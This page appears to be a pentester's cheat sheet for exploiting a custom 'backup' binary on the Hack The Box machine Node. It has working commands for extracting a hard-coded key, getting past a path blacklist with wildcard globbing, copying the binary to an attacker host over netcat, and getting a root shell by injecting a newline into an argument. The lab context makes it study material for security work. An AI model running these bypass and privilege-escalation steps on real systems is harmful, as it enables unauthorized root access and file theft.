binaries


Last updated 2 years ago

You found a custom Binary

  • What does it do?

  • Perhaps a script or job is running it.

  • How many options does it take?

  • How can you exploit it?


"backup" example

  • From nodeHTB (the Hack The Box machine Node):

  • Custom app: /usr/local/bin/backup

  • Find a script that executes 'backup' and learn from it how the binary is called!

grep -Ri backup .               ..find references to 'backup'
find . | grep app.js            ..find our app
cat /var/www/myplace/app.js

const backup_key  = '45fac123...';
app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

backup -q key /dir   ..we learned how to execute!

backup /root

----------------
backup -q key /dir                                    ..how to execute!
/usr/local/bin/backup -q 45fac123... /tmp > out.txt   ..works!
base64 -d out.txt > decode-base64                     ..decode
file decode-base64                                    ..zip archive
unzip decode-base64                                   ..unzip

----------------
get root:
/usr/local/bin/backup -q 45fac123... /root > root.txt
base64 -d root.txt > /tmp/root
unzip root         ..failed
7z x rootdecoded   ..kinda worked?
cat root           ..failed

Avoid '/root' Filter with Splatting

----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
./backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

----------------
myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded

Work Local

  • Send the file to yourself; you have better analysis tools locally!

nc -nlvp 4444 > backup                  ..receive (start this first, on your box)
nc $MyIP 4444 < /usr/local/bin/backup   ..send (from the target)

md5sum backup                     ..confirm
chmod +x ./backup

strace

strace ./backup                    ..might be interesting
strace ./backup 1 2 3              ..works better with 3 arguments :)

ltrace   ..showed that our app filters 'root', 'etc' and other strings
ltrace /usr/local/bin/backup -q secretkey /root/root.txt

Analyze Assembly: radare2

r2 backup   ..open the binary
aaa       ..analyze
afl       ..function list
vvv       ..visual mode
sym.main  ..scroll here
g g       ..get details
<space>   ..change view: nice call graph

./backup 1 2 3           ..App needs 3 Arguments!
strace ./backup 1 2 3    ..reads from /etc/myplace/keys

Analyze Assembly: binaryninja

  • Better graphics than radare2

  • But it doesn't show hex nicely

/opt/binaryninja/binaryninja

'main'  ..start here; drill around, follow the blacklist and the trollface string
'push'  ..keyword to watch for (string constants being pushed before a call)

Found the blacklist (filtered strings): /root $ ` ; | /etc // /

PrivEsc: Newline Character

/bin/myapp -q secretkey "xxx
> /bin/bash
> xxx"
# whoami ..root!

PrivEsc: Newline Character printf

  • A newline produced by printf can also give you root!

------------------
printf 'hi\nNewLine\nBye'  ..gives us new lines

------------------
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/bash\nxxx')"
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/sh\nxxx')"

REF:

  • BufferOverflow
  • CharEvasion
  • PrivEsc
  • mongodb
  • https://joshuasuren.medium.com/hack-the-box-node-write-up-11-b47efb3c98ab